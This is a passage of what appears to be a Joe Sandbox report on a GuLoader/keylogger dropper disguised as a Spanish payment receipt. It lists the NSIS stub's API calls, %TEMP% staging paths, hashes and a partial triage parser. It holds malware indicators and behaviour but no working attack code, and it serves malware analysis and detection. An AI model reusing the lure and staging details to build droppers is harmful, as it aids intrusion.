• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
• SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
• ShowWindow.USER32(?,00000008), ref: 004057F5
• GetDlgItem.USER32(?,000003EC), ref: 00405816
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
• GetDlgItem.USER32(?,000003F8), ref: 00405724
  • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
• GetDlgItem.USER32(?,000003EC), ref: 00405868
• CreateThread.KERNELBASE(00000000,00000000,Function_0000563C,00000000), ref: 00405876
• CloseHandle.KERNELBASE(00000000), ref: 0040587D
• ShowWindow.USER32(00000000), ref: 004058A1
• ShowWindow.USER32(?,00000008), ref: 004058A6
• ShowWindow.USER32(00000008), ref: 004058F0
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
• CreatePopupMenu.USER32 ref: 00405935
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405949
• GetWindowRect.USER32(?,?), ref: 00405969
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
• OpenClipboard.USER32(00000000), ref: 004059CA
• EmptyClipboard.USER32 ref: 004059D0
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
• GlobalLock.KERNEL32(00000000), ref: 004059E6
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
• GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
• SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
• CloseClipboard.USER32 ref: 00405A2B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: {
• API String ID: 590372296-366298937
• Opcode ID: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
• Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
• Opcode Fuzzy Hash: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
• Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68

Control-flow Graph (graph data not reproduced)

APIs
• DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
• lstrcatW.KERNEL32(00425710,\*.*,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C84
• lstrcatW.KERNEL32(?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CA7
• lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
• FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
• FindClose.KERNEL32(00000000), ref: 00405D6C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
• API String ID: 2035342205-4130279798
• Opcode ID: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
• Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
• Opcode Fuzzy Hash: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
• Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE

Control-flow Graph

control_flow_graph: function starting at 406bfe (the rendered graph's basic-block edge listing is omitted; its blocks call GlobalFree and GlobalAlloc)
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
• Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
• Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
• Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45
APIs
• FindFirstFileW.KERNELBASE(74DF3420,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406848
• FindClose.KERNEL32(00000000), ref: 00406854
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: XgB
• API String ID: 2295610775-796949446
• Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
• Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
• Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
• Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC

Control-flow Graph

control_flow_graph: function starting at 403f64 (the rendered graph's basic-block edge listing is omitted; the dialog and window API calls made by its blocks are listed under APIs below)
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
• ShowWindow.USER32(?), ref: 00403FC0
• GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
• ShowWindow.USER32(?,00000004), ref: 00403FEB
• DestroyWindow.USER32 ref: 00403FFF
• SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
• GetDlgItem.USER32(?,?), ref: 00404037
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
• IsWindowEnabled.USER32(00000000), ref: 00404052
• GetDlgItem.USER32(?,00000001), ref: 004040FD
• GetDlgItem.USER32(?,00000002), ref: 00404107
• SetClassLongW.USER32(?,000000F2,?), ref: 00404121
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
• GetDlgItem.USER32(?,00000003), ref: 00404218
• ShowWindow.USER32(00000000,?), ref: 00404239
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
• EnableWindow.USER32(?,?), ref: 00404266
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
• EnableMenuItem.USER32(00000000), ref: 00404283
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
• lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
• SetWindowTextW.USER32(?,00423708), ref: 004042EC
• ShowWindow.USER32(?,0000000A), ref: 00404420
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 121052019-0
                                                                                                                                                                                    • Opcode ID: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                                                                                                                                                                                    • Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E

Control-flow Graph (entry block 403bb6; legend: Executed / Not Executed)
APIs
  • Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
  • Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901
• lstrcatW.KERNEL32(1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403C37
• lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,74DF3420), ref: 00403CB7
• lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
• GetFileAttributesW.KERNEL32(: Completed,?,00000000,?), ref: 00403CD5
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner), ref: 00403D1E
  • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
• RegisterClassW.USER32(004291C0), ref: 00403D5B
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
• ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
• GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403E0A
• GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403E17
• RegisterClassW.USER32(004291C0), ref: 00403E20
• DialogBoxParamW.USER32(?,00000000,00403F64,00000000), ref: 00403E3F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 1975747703-1964700046
• Opcode ID: 6641f25268bcb411ff60996ee06ee97a96bb8d093e03f8a241686f6243dfe293
• Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
• Opcode Fuzzy Hash: 6641f25268bcb411ff60996ee06ee97a96bb8d093e03f8a241686f6243dfe293
• Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D

Control-flow Graph (entry block 40307d; legend: Executed / Not Executed)
APIs
• GetTickCount.KERNEL32 ref: 0040308E
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA
  • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
  • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
• GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
• GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
• String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Justificante pago-09453256434687.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
• API String ID: 2803837635-1997050567
• Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
• Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
• Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
• Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D

Control-flow Graph (entry block 406544; legend: Executed / Not Executed)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040665F
                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004055A0,Completed,00000000,00000000,00418EC0,00000000), ref: 00406672
                                                                                                                                                                                    • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                                    • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                                                                    • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                    • API String ID: 4260037668-905382516
                                                                                                                                                                                    • Opcode ID: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
                                                                                                                                                                                    • Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D

Control-flow Graph
• Function 0040176F-00402C39 (entry 0040176F). Imports called from its blocks: lstrcatW, CompareFileTime, SetFileTime, CloseHandle. Internal callees: 00402DA6, 004032B4, 00405569, 00405B67, 00405DD6, 00405E4D, 00405FD2, 00405FF7, 00406507, 00406544, 0040678E, 0040683D. (Basic-block graph not reproduced.)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes,?,?,00000031), ref: 004017B0
                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes,?,?,00000031), ref: 004017D5
                                                                                                                                                                                      • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                                                                                                                                                                      • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                                      • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                                      • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                                      • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                                      • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                                      • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                                      • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes$C:\Users\user\AppData\Local\Temp\nsj887A.tmp\nsExec.dll$ExecToStack
                                                                                                                                                                                    • API String ID: 1941528284-3918912089
                                                                                                                                                                                    • Opcode ID: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
                                                                                                                                                                                    • Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
                                                                                                                                                                                    • Opcode Fuzzy Hash: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
                                                                                                                                                                                    • Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E
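The records above belong to the sample's NSIS installer stub rather than to the GuLoader/keylogger payload: the "NSIS Error" string passed to lstrcpynW and the nsExec.dll / ExecToStack call are NSIS's own runtime and plugin, so the useful triage output is the paths the stub builds (the plugin dropped to C:\Users\user\AppData\Local\Temp\nsj887A.tmp and the staging directory under %TEMP%) and which blocks reach which imports. Once the report is exported, the "APIs" bullets and the flattened control_flow_graph token stream are plain text, and the parser below turns both into data. It is an added example written for this page, not Joe Sandbox code: the API sample lines are copied from the records above, the graph excerpt is a constructed subset of the 00406544 record's blocks and edges, and the "sub_" callee naming, the %TEMP% pattern in TEMP_RE and the assumption that node ids are small decimal integers while addresses are 6-8 hex digits are mine.

```python
"""Parse exported Joe Sandbox function records (the 'APIs' bullet lines and the flattened
'control_flow_graph' token stream) into structured data for triage.
Added example for this report page, not Joe Sandbox code. SAMPLE_APIS is copied from the
report; SAMPLE_CFG is a constructed subset of the first function's blocks and edges."""
import re
from collections import defaultdict, deque

# • [Part of subcall function XXXXXXXX: ]Api.MODULE(arg,arg,...), ref: XXXXXXXX
API_RE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")                      # immediates such as -00000014
ADDR_RE = re.compile(r"^[0-9A-Fa-f]{6,8}(-[0-9A-Fa-f]{6,8})?$")  # block range or single address
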